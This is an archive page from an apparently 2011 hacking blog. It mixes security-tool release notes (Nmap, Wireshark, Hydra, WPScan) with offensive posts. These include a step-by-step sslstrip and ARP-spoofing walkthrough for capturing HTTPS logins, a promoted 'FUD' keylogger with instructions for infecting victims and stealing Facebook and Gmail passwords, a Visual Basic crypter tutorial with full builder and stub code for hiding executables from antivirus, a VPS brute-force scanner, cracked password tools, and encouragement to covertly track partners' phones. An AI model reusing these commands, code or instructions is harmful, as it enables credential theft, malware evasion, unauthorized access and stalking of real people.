Related Post

.
Showing posts with label Tools. Show all posts
Showing posts with label Tools. Show all posts

Thursday, 6 October 2011

GPU cracks 6 character password in 4 seconds

An nVidia GeForce GT220 graphics card, which costs about £30, is capable of cracking strong passwords in a matter of hours. Security experts were able to crack a  6 character password in 12 seconds, a 7 character password in less than 5 minutes, and 8 character password in four hours.
"People have worked out that the processing power of graphics cards, due to the architecture of the chips, is more powerful than a normal processor for doing certain tasks," said Neil Lathwood, IT director at UKFast.

Saturday, 1 October 2011

Nmap 5.61 TEST2 - IPv6 OS detection Added

Nmap Added IPv6 OS detection, CPE, 30 more scripts, and more features in latest release Nmap 5.61 TEST2.
Change Log for Nmap 5.61TEST2

  • Added IPv6 OS detection system! The new system utilizes many tests similar to IPv4, and also some IPv6-specific ones that we found to be particularly effective. And it uses a machine learning approach rather than the static classifier we use for IPv4. We hope to move some of the IPv6 innovations back to our IPv4 system if they work out well. The database is still very small, so please submit anyfingerprints that Nmap gives you to the specified URL (as long asyou are certain that you know what the target system isrunning). Usage and results output are basically the same as withIPv4, but we will soon document the internal mechanisms athttp://nmap.org/book/osdetect.html, just as we have for IPv4. For anexample, try "nmap -6 -O scanme.nmap.org". [David, Luis]
  • [NSE] Added 3 scripts, bringing the total to 246! You can learnmore about them at http://nmap.org/nsedoc/. Here they are (authorslisted in brackets):
    • + lltd-discovery uses the Microsoft LLTD protocol to discover hostson a local network. [Gorjan Petrovski]
    • + ssl-google-cert-catalog queries Google's Certificate Catalog forthe SSL certificates retrieved from target hosts. [Vasiliy Kulikov]
    • + quake3-info extracts information from a Quake3-like gameserver. [Toni Ruottu]
  • Improved AIX support for raw scans. This includes some patchesoriginally written by Peter O'Gorman and Florian Schmid. It alsoinvolved various build fixes found necessary on AIX 6.1 and 7.1. Seehttp://nmap.org/book/inst-other-platforms.html. [David]
  • [NSE] Moved our brute force authentication cracking scripts(*-brute) from the "auth" category into a new "brute"category. Nmap's brute force capabilities have grown tremendously!You can see all 32 of them athttp://nmap.org/nsedoc/categories/brute.html. It isn't clearwhether dns-brute should be in the brute category, so for now itisn't. [Fyodor]
  • Made the interface gathering loop work on Linux when an interfaceindex is more than two digits in /proc/sys/if_inet6. Joe McEacherntracked down the problem and provided the fix.
  • [NSE] Fixed a bug in dns.lua: ensure that dns.query() always return two values(status, response) and replaced the workaround in asn-query.nse by the properuse. [Henri]
  • [NSE] Made irc-info.nse handle the case where the MOTD is missing.Patch by Sebastian Dragomir.

Tuesday, 27 September 2011

Download Windows 8 Developer Preview

Microsoft has released its Windows 8 Developer Preview operating system, for PCs and tablets, to the public as a free download.
Microsoft has made available three different versions of Windows 8 for download (two versions built for 64-bit systems which use new processors and can make use of more RAM, versus older 32-bit PCs that use earlier chips and less memory), which all show up as an ISO file when downloaded.




Official Microsoft Download Links:-

Windows Developer Preview with Developer tools English, 64-bit (x64)

Windows Developer Preview without Developer tools English, 64-bit (x64)

Windows Developer Preview English, 32-bit (x86)

Download : Google+ Android Application

Anroid has lanched  "Google +Android Application for  "Google +" Lover .So they can also access Google + from there Android Mobile.This application will work in 2.1 and greater version.Check it’s features.

Features :-

  • Circles let you share the right things with just the right people.
  • Stream is where you can get updates from your circles or see what people are saying about things nearby.
  • Instant Upload automatically uploads videos and photos to your own private album in the cloud, to make sharing a snap.
  • Huddle is super-fast group messaging for everyone in your circles.

Download 

Friday, 23 September 2011

BruCON Agnitio workshop Slides and Video Demonstration - Download

Workshop by David Rook (Security Ninja) at BruCON 2011 in Belgium. You can Download Slide from here.
Required for the Agnitio hands on demos:
Optional
In addition to the list above the following things are optional depending on how hands on you want to be:
  • Internet connection to download an application from the Android market place
  • Eclipse IDE installed
  • Android SDK installed
  • Android Debug Bridge (adb) installed, this should be installed as part of the SDK install
  • An AVD configured with the Android market place app installed (instructions here)
  • I think you can also use a rooted Android device if you don’t want to use the emulator
Workshop format
  • A quick look at static analysis and the strengths and weaknesses of humans and software
  • What is Agnitio and why do I think checklists are a vital component of security code reviews
  • Some examples of what can go wrong if you don’t use checklists to find and remove simple flaws
  • Demos/hands on: using checklists in Agnitio to review source code, produce reports and metrics
  • Demos/hands on: how to customise your Agnitio installation
  • A look at mobile (Android and iOS) application security and how analysis is currently done
  • Demo/hands on: using the mobile specific rule sets in the Agnitio static analysis module
  • Demo/hands on: downloading an app from the marketplace and decompiling it using Agnitio

Thursday, 15 September 2011

THC-HYDRA v7.0 new version released for Download

THC-HYDRA is a very fast network logon cracker which support many different services. This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system. It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD and OSX.

Official change log:

  • New main engine for hydra: better performance, flexibility and stability
  • New option -u – loop around users, not passwords
  • Option -e now also works with -x and -C
  • Added RDP module, domain can be passed as argument
  • Added other_domain option to smb module to test trusted domains
  • Small enhancement for http and http-proxy module for standard ignoring servers
  • Lots of bugfixes, especially with many tasks, multiple targets and restore file
  • Fixes for a few http-form issues
  • Fix smb module NTLM hash use
  • Fixed Firebird module deprecated API call
  • Fixed for dpl4hydra to work on old sed implementations (OS/X …)
  • Fixed makefile to install dpl4hydra (thx @sitecrea)
  • Fixed local buffer overflow in debug output function (required -d to be used)
  • Fixed xhydra running warnings and correct quit action event

Download THC-HYDRA v7.0

Saturday, 10 September 2011

Anonymous Releases Twitter Hijack Tool Called URGE

The long promised tool that can be used to hijack tweets was recently released on the Anonymous hacker group's official blog, complete with download links, source files and how-to instructions.

anonymous-URGE

The Anonymous group of online activists released a new tool yesterday designed to allow people to hijack trending topics on Twitter and tweet messages within them.

Dubbed URGE (for Universal Rapid Gamma Emitter), the beta software is available for download for Windows computers and requires .Net Framework 4 to work.

"This is not a hacking tool nor is it an exploit tool," the group said in a statement. "It was created to make it easier for us to tweet faster without copying and pasting constantly."

Anonymous members say they are annoyed with all the redundant and "pop culture" topics featured on Twitter Trends and want to draw more attention to topics that "actually serve a cause."

"We have taken note of why Twitter would not do so, they only trend topics which would 'appeal' to people and can get people to tweet more," the statement says. "This was pathetic in our eyes, and we could not stand by and take it anymore."

URGE will allow people to spread the message of Anonymous--including "bashing corrupt politicians," among other causes--by riding the coattails of trending topics. "This will help raise awareness of problems going on in this world and show people that real problems exist outside of 'Jersey Shore' and 'Sex,'" according to the statement.

Wireshark 1.4.9 & Wireshark 1.6.2 updated version released


Wireshark is the world’s most popular network protocol analyzer. It is used for troubleshooting, analysis, development, and education.
The following bugs have been fixed:

  • configure ignores (partially) LDFLAGS. (Bug 5607)
  • Build fails when it tries to #include , not present in Solaris 9. (Bug 5608)
  • Unable to configure zero length SNMP Engine ID. (Bug 5731)
  • BACnet who-is request device range values are not decoded correctly in the packet details window. (Bug 5769)
  • H.323 RAS packets missing from packet counts in “Telephony->VoIP Calls” and the “Flow Graph” for the call. (Bug 5848)
  • Wireshark crashes if sercosiii module isn’t installed. (Bug 6006)
  • Editcap could create invalid pcap files when converting from JPEG. (Bug 6010)
  • Timestamp is incorrectly decoded for ICMP Timestamp Response packets from MS Windows. (Bug 6114)
  • Malformed Packet in decode for BGP-AD update. (Bug 6122)
  • Wrong display of CSN_BIT in CSN.1. (Bug 6151)
  • Fix CSN_RECURSIVE_TARRAY last bit error in packet-csn1.c. (Bug 6166)
  • Wireshark cannot display Reachable time & Retrans timer in IPv6 RA messages. (Bug 6168)
  • ReadPropertyMultiple-ACK not correctly dissected. (Bug 6178)
  • GTPv2 dissectors should treat gtpv2_ccrsi as optional. (Bug 6183)
  • BGP : AS_PATH attribute was decode wrong. (Bug 6188)
  • Fixes for SCPS TCP option. (Bug 6194)
  • Offset calculated incorrectly for sFlow extended data. (Bug 6219)
  • [Enter] key behavior varies when manually typing display filters. (Bug 6228)
  • Contents of pcapng EnhancedPacketBlocks with comments aren’t displayed. (Bug 6229)
  • Misdecoding 3G Neighbour Cell Information Element in SI2quater message due to a coding typo. (Bug 6237)
  • Mis-spelled word “unknown” in assorted files. (Bug 6244)
  • tshark run with -Tpdml makes a seg fault. (Bug 6245)
  • btl2cap extended window shows wrong bit. (Bug 6257)
  • NDMP dissector incorrectly represents “ndmp.bytes_left_to_read” as signed. (Bug 6262)
  • TShark/dumpcap skips capture duration flag occasionally. (Bug 6280)
  • File types with no snaplen written out with a zero snaplen in pcap-ng files. (Bug 6289)
  • Wireshark improperly parsing 802.11 Beacon Country Information tag. (Bug 6264)
  • ERF records with extension headers not written out correctly to pcap or pcap-ng files. (Bug 6265)
  • RTPS2: MAX_BITMAP_SIZE is defined incorrectly. (Bug 6276)
  • Copying from RTP stream analysis copies 1st line many times. (Bug 6279)
  • Wrong display of CSN_BIT under CSN_UNION. (Bug 6287)
  • MEGACO context tracking fix – context id reuse. (Bug 6311)

Updated Protocol Support BACapp, Bluetooth L2CAP, CSN.1, DCERPC, GSM A RR, GTPv2, ICMP, ICMPv6, IKE, MEGACO, MSISDN, NDMP, OpenSafety, RTPS2, sFlow, SNMP, TCP


New and Updated Capture File Support
CommView, pcap-ng, JPEG.
Download Wireshark

Saturday, 3 September 2011

SSL Sniffing : How to Sniff HTTPs Packets ?

In this post I'm going to xplain sniffing HTTPs Packets which is not for N00BS but is a HIGH LEVEL HACKING..

HTTPs which is most secure network running packets that is used for online banking like paypal, banksite,etc. Also in email accounts like gmail and even facebok, now can be sniff by any hacker which have the eligible tools for that.


A new tool presented at the Black Hat DC 2009 conference by Moxie Marlinspike proves to be a formidable foe against secure login schemes. Always trying to stay on top of the game, Click Death Squad decides to give this tool a whirl and see what the buzz is all about. This attack is particularly crafty because it acts as a Man in the Middle, keeping an eye on HTTPS requests and then mapping them to HTTP look alike setups. If a person were operating on a wireless access point that had been broken into, the results can be devastating. You have a box running sslstrip which has port forwarding enabled and is actively spoofing ARP on a LAN. This computer is the jump off point, which will fake out the wireless router into redirecting HTTPS requests, modifying them and passing them on to the victim. Features include a fake “lock” icon and selective logging capabilities, which provide great flexibility when sniffing traffic.  

Tools you will need to accomplish this task :
  • A wireless network that you have access to and can test
  • A “victim” computer acting as the client being sniffed
  • A Linux box with sslstrip installed
  • Basic Linux networking skills and command line capabilities
Step 1: Tell the kernel to enable IP forwarding.

Your box will be acting as the intermediary between the victim and the intended destination. You must enable IP forwarding so that packets can be passed through your machine. This is pretty simple, just pass a value to the kernel that tells it to enable forwarding for packets.
“sudo echo 1 > /proc/sys/net/ipv4/ip_forward” ### enable IP forwarding in the Linux kernel.
Step 2: Set an iptables firewall rule that fowards HTTP traffic from the victim to your box for modification.

As the victim is actively browsing websites, your computer needs to act as a middle man so that when the user is directed to an HTTPS login, your computer modifies the data and passes it along. By setting up an iptables rule, you can have the traffic get passed to your computer, modify it using sslstrip and then pass the “faked out” version to the victim and capture login information.
“sudo iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 666″ ### iptables will forward port 80 to our box, running sslstrip on port 666.

The firewall rules on your box have been set to forward all traffic on port 80 (HTTP) which might be received by the victim. The key is passing the victim’s traffic through your box to sslstrip, which will modify any HTTPS login requests and forward them to the correct destination. By doing so, the login information can be captured.
 
Step 3: ARP spoof the target traffic to redirect to your machine .


Using arpspoof, you can redirect all the victim’s traffic to your machine. After you enabled your iptables firewall rule to pass HTTP traffic and modify it, you need to redirect the traffic to your box. Use arpspoof to direct traffic to your machine so that HTTP requests can be modified for hijacking.
sudo “arpspoof -i wlan0 192.168.1.121 192.168.1.1″ ### where 192.168.1.121 is the target and 192.168.1.1 is the wireless access point ip address.
All the steps are in place. Iptables is setup to redirect HTTP requests to sslstrip, ARP spoofing is redirecting traffic from the victim to our box and your machine is forwarding requests. The last step is to actually run sslstrip and start hijacking some sessions.

Step 4: Run sslstrip and capture some passwords.

Start the sslstrip server running on your machine and watch what happens. A victim loads a website, and because you’re ARP spoofing, the request is directed to your machine first. The request is modified by sslstrip, then iptables forwards the modified traffic to the intended destination. 
sudo “python sslstrip.py -l 666 -f lock.ico” ### load sslstrip and use the provided lock.ico icon as a replacement if need be.
Here we can see that the server is started
It Looks like the victim logged into “secure.myspace.com” to check their page out…

Now we can see , we were able to capture a password from a modified request. So now before implementing HTTPS now again you have to think twice.

Trace Anyones Mobile with G.P.S. and without G.P.S.

Do you doubt on your Boyfriend/Girlfriend ? Do you wanna track them via mobile location? This is now possible...I'm not joking. Many of us think that this is not possible or we have to spend some money for such services but believe me that we don’t have to spend any money for getting this done.  Yes, PhoneOnMap makes it possible, which provides a free application that has to be installed in G.P.S. cell phone and you are ready to track the phone from anywhere on the Internet.

This application can be useful for office work as well as family members. You can track your child as well as your girlfrend/wife too (:P) . This PhoneOnMap can be used worldwide and you can use it while travelling too. The data is stored on the company’s server for a period of one month. This can be an invaluable source for sales and marketting department of an organization to track the marketing agents.

If you are worried about the security and privacy of the service, let me tell that it is very secure and your cell phone can not be monitored by any Unauthorized User as in order to access the tracking system, you have to authenticate yourself through a personal code which was used as identification while installingapplication on cell phone.

Features of  GPS cell phone tracking system :-

1. GPS cell phone tracker and locater will not work in the underground transportation .
2. The application does not work when the phone is turned off.
3. The data transmission outside provider’s coverage area will add roaming charges like any other phone service charge us .
4. Once application is uninstalled from cell phone than you can’t do anything .
5. On internet tracking system will show cell phone location between every 10 seconds to 10 minutes , which is depend on setting .

Accordng to me this kind of service is very important for parents to track their children and from a business usage point of view an invaluable part of companies involved in supply and delvery system like Courrier and Home delivery system. This will help them to get a realtime location of the object and provide an accurate timeframe for the delivery.

As of now this service does not provide the exact pin point location but the location determined s in the range of 10-20 meters. However with little intelligence the exact location can be easily determined especially when you wish to track your children or the cheating boyfriend/girlfrend…(lol)

Hack Facebook Accounts , Hack Gmail Account With FUD Keylogger

FUD Keylogger are always in need. But when ever I give any Keylogger it got arrested by most of the Anti-virus. In spite of that I am today going to share a new version of FUD Keylogger to Hack Facebook Account. You can even Hack Gmail Accounts with this keylogger. But mostly this keylogger is used for Hacking Of Facebook Accounts.

Hack Facebook Accounts , Hack Gmail Account With FUD Keylogger

Here I am going to present a New Remote Keylogger which has the power to hack facebook accounts and to record all the key strokes typed


Features Of New UD Remote Keylogger :

  • UD - 3/33
  • You Can Use Gmail Account to get the logs
  • Add To Start Up also included
  • It also Kills Task Manager
  • Automatically Hides the virus after infecting the victim
  • Also Disables Registry Editing
  • Stops victim From Ending Your Keylogger's Process
  • New Icon Changer
  • File Binder
  • With Fake Error Message
  • Includes Time Interval

How To Use This Remote Keylogger for Hacking Of Facebook Accounts

- Download The Remote UD Keylogger and extract the folder to desktop
- Open the Remote keylogger and enter new created Gmail account username and password
- Select the other settings as you need and donot forget to change Time Interval to 2 min
- If you want then use Icon changer, File Binder, etc and then click on Build Server
- Now upload this keylogger to file sharing sites like megaupload.com , mediafire.com
- Now send Server to victim by any mean and when he/she will click on server, he will be hacked
- Now you will get the victim typed keystroke which also includes Hack Facebook Account Password
- You can hack any account by this Remote Keylogger

So you are done, I am sure that you will enjoy this Remote Keylogger and if you have any problem then please do comment and share your problem. I am always ready to help you all.

Incoming search terms:-
  • Hack Facebook Account
  • Hacking of facebook account
  • Hack gmail account
  • Hack facebook account password
  • Hack facebook account online

Tuesday, 30 August 2011

How To Make a CRYPTER ?

How To Make a crypter ?
What you will need:
Visual Basic 6 or Visual Basic 6 Portable
A RC4 module
A brain


The RC4 module and Visual Basic 6 Portable will have the download links at the end of this tutorial.

TABLE OF CONTENTS:
1. Introduction
2. Building your crypter
3. Conclusion

1. Introduction

RC4:
In cryptography, RC4 (also known as ARCFOUR or ARC4 meaning Alleged RC4, see below) is the most widely used stream cipher and is used in protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and WEP (to secure wireless networks).

Stub:
A method stub or simply stub in software development is a piece of code used to stand in for some other programming functionality. A stub may simulate the behavior of existing code (such as a procedure on a remote machine) or be a temporary substitute for yet-to-be-developed code. Stubs are therefore most useful in porting, distributed computing as well as general software development and testing.

Builder:
A builder is usually the client to make/do something to a file, and it is supposed to go with a stub. The builder usually allows the stub to simulate the behaivor of existing code, and than it makes the file/does something to a file.

2. Building your crypter.

Now, open up Visual Basic 6 or Visual Basic Portable. To make the task easier, open two Visual Basic 6 programs. One is going to be the builder, and one is going to be the stub.

Now, lets start on the builder. Add a RC4 module, and lets go on. First of all, add one label that says "File Path:", a text box right beside "File Path:", a button that says "Browse" or "...", and another button that says "Crypt" or "Build". Now, lets add the CommonDialog control. Add a CommonDialog and name it commondlg. Now, lets double click the button that says "Browse" or "...". Add this code, and I'll explain it.



Code:
With commondlg 'CommonDialog1.
     .Filter = "Executable files | *.exe" 'The file used for crypting. (*.exe)
     .DialogTitle = "Please select a executable file..." 'The title of the dialog.
     .ShowOpen 'Show the dialog.
     End With
     TextBox1.Text = commondlg.FileName 'Make TextBox1.Text as the selected filename.

The With commondlg command calls CommonDialog1.
The .Filter part allows you to choose what files you only want to be selected.
The .DialogTitle command is the title of the dialog (the prompt that tells you which file you want to select for crypting).
The .ShowOpen command shows the dialog.
End With will end CommonDialog1.
And finally, the TextBox1.Text = commondlg.FileName command makes TextBox1.text show the selected filename.

Now, click the button that says "Build" or "Crypt". Add this code. It explains it, so please take time to read what it says.
Code:
Dim sStub As String, sFile As String 'This command will declare the two strings.
Open App.Path & "\stub.exe" For Binary As #1 'Opens up the stub.
sStub = Space(LOF(1)) 'This declares the space.
Get #1, , sStub 'This puts in a space in the file.
Close #1 'This closes the file.

Open TextBox1.Text For Binary As #1 'Opens up the stub.
sFile = Space(LOF(1)) 'This declares the space.
Get #1, , sFile 'This puts a space in the file.
Close #1 'This closes the file.

Open App.Path & "\output.exe" For Binary As #1 'This creates the crypted file as "output.exe".
Put #1, , sStub & FileSplit & RC4(sFile, Pass) 'This adds the option FileSplit and the RC4 option.
Close #1 'This closes the file.

MsgBox ("File crypted successfully!") 'This is the prompt to show the message that the program successfully crypted the file.

Now, you might have an error that will show you that FileSplit and Pass is not declared. To do so, we will add the declarations on the top of the coding.

Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password.

For this tutorial, we will be using "s0rasRC4Tutorial" as the RC4 password.

Now, lets start on the stub. Add the RC4 module, and make a new module called modMain. Add this code in modMain:
Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password; It must be the same as the one on the builder!

Public Declare Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal LpszDir As String, ByVal FsShowCmd As Long) As Long 'Calls the ShellExecute command.

Public Sub Main() 'The main part of the stub.
Dim sStub As String, sFile As String 'This will declare the strings again, just like we did on the builder.
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 'Opens up the selected .exe file.
sStub = Space(LOF(1)) 'This will declare the space.
Get #1, , sStub 'This puts a space in the file.
Close #1 'This closes the file.

sFile = Split(sStub, FileSplit)(1) 'This will split the file and the stub.
Open Environ("tmp") & "\decrypted.exe" For Binary As #1 'This will make a decrypted file in the RC4 folder.
Put #1, , RC4(sFile, Pass) 'This will add the RC4 password to the file with the selected RC4 password.

Call ShellExecute(0, vbNullString, Environ("tmp") & "\decrypted.exe", vbNullString, vbNullString, 1) 'Calls the ShellExecute command and drops the decrypted file in the temporary files folder.

End Sub 'This ends "Public Sub Main()".

The code will be teaching you. Once you're done, remove the Form1.

3. Conclusion
I hope you liked this tutorial, and I hope you learned a lot about crypting with RC4!

Visual Basic 6 Portable: http://www.mediafire.com/?tgicg4hn1n5
RC4 module: http://www.freevbcode.com/ShowCode.asp?ID=4398

iCrypt Err0r Version

This crypter makes Your Trojan undetectable. Never Upload at virustotal use only NoVirusThanks.org

[Image: proggy.jpg]  

Cryptinator - A simple Encryption Application

Today i decided to make a program like the following one i saw earlier.
[Image: 43201152623pm.png]

But instead of just copying it exactly, i used a different encryption algorithm (polystairs) and different methods towards generating/compiling a code.

I am not sure what you would have use for this, but for me when ever i need a completely random string i will use this now.

Cryptinator ScreenShot:
[Image: screenshotzu.png]

WordPress Security/Vulnerability Scanner - WPScan

WPScan is a vulnerability scanner which checks the security of WordPress installations using a black box approach (scanning without any prior knowledge of what has been installed etc).

Features

  • Username enumeration (from author querystring and location header)
  • Weak password cracking (multithreaded)
  • Version enumeration (from generator meta tag)
  • Vulnerability enumeration (based on version)
  • Plugin enumeration (2220 most popular by default)
  • Plugin vulnerability enumeration (based on version) (todo)
  • Plugin enumeration list generation
  • Other misc WordPress checks (theme name, dir listing, …)

Requirements

WPScan requires two non native Ruby gems, typhoeus and xml-simple. It should work on both Ruby 1.8.x and 1.9.x.

sudo apt-get install libcurl4-gnutls-dev
sudo gem install –user-install typhoeus
sudo gem install –user-install xml-simple

The full README is available here.

You can download WPScan by checking it out from the SVN repository on Google Code:

svn checkout http://wpscan.googlecode.com/svn/trunk/ wpscan-read-only

Or you can read more here.

Best Password Hacking, Breaking Tools

Hello Friends , Today I am sharing with you my latest Collection of "Best Password Hacking Tools 2011". Using this password hacking kit you will be able to crack a lot of passwords like Windows Admin password, pdf passwords, zip files passwords, document passwords, rar passwords and much more.. I am sure you will like this post.


best hacking tools, password crackers, password hacking softwares


This Password Hacking Kit Consists of following Password Hacking Breaking Tools:
1. PDF Password Remover
2. Windows XP Admin Password Remover
3. Zip File Password Cracker.
4. SQL Password Remover
5. Microsoft Office Password Remover.
6. Microsoft Windows Vista Password Remover.
7. Rar File Password Cracker
8. Windows Password Recovery Kit
9. Password Changer.
10. Distributed File Password Recovery..
and much more..

As the name of the tools suggests its a complete password hacking Kit. So guys Enjoy Latest Hacking tools ..

How to Use it??
1. Download the Password Hacking Kit From Below:

2. Extract the file and Install it.

3. Then Register them and use it. ( all tools contains Full serial keys and patches)..

Saturday, 20 August 2011

Download VPS Scanner for free (premium Software)

Note: The tools and instructions provided here are only for educational purposes, we do not take any responsibility of what you may use the information for and apply it.

[Image: vps2.PNG]

Basically what it does is that it scans a certain IP block you give like /32, /16, /8, etc. It will then try to dictionary brute the ip address while at the same time look for more servers. You can customize the pass list to as big or small as you want. Mostly this application depends on luck and the size of your pass list. The bigger the list the more of a chance you'll get the VPS.

Download:

Thursday, 11 August 2011

WebsiteDefender – Ensure Your Website Security

WebsiteDefender is an online service that monitors your website for hacker activity, audits the security of your web site and gives you easy to understand solutions to keep your website safe. With WebsiteDefender you can:

  • Detect Malware present on your website
  • Audit your web site for security issues
  • Avoid getting blacklisted by Google
  • Keep your web site content & data safe
  • Get alerted to suspicious hacker activity
It has an easy to user interface, it picks up all kinds of issues such as malware, reverse shells like c99, obvious stuff like outdated Plugins and WordPress core, weak passwords, bad configurations (including .htaccess config) and much more.
WebsiteDefender
Each alert is well explained and will help you to solve any issues the system finds on your blog/site.
WebsiteDefender
The great value with this for me is once you are subscribed, you will be automatically alerted of new issues by email as and when they occur. This will help you keep your website secure and will let you know immediately if any issues develop.
They’ve even released two WordPress plugins which you can find here:
WP Security Scan & Secure WordPress
You can check out the website here and sign up for a free account to test it out:
http://www.websitedefender.com/
They are on Twitter too @WebsiteDefender & Facebook.

FireCAT 2.0 Released - Firefox Catalog of Auditing Extensions

FireCAT (Firefox Catalog of Auditing exTensions) is a mindmap collection of the most efficient and useful Firefox extensions oriented application security auditing and assessment. FireCAT is not a replacement of other security utilities and software as well as fuzzers, proxies and application vulnerabilities scanners.


FireCAT v2.0 - Firefox Catalog of Auditing exTensions


  • Information Gathering
  • Proxies & Web Utilities
  • Editors
  • Network Utilities
  • Misc
  • IT Security Related
  • Application Auditing
Download FireCAT here

Saturday, 6 August 2011

BlackBuntu V0.3 Released

Twitter Delicious Facebook Digg Stumbleupon Favorites More

Adverts

BannerAd BannerAd BannerAd BannerAd